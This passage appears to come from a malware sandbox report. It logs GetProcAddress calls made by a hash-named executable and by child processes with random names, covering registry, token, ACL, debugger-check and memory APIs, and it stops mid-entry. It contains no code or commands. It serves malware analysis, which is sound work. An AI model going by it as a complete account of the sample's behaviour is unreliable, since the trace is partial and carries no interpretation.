\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005832)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006120)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00004296)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003636)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter TlsSetValue (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter TlsGetValue (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter lstrcpyW (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter WaitForMultipleObjectsEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VirtualQueryEx (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VirtualQuery (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter TryEnterCriticalSection (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SystemTimeToTzSpecificLocalTime (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SwitchToThread (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SuspendThread (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SizeofResource (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SignalObjectAndWait (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetThreadPriority (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetThreadLocale (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetLastError (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00001924)\n \"ywrej.exe\" called \"GetProcAddress\" with a parameter 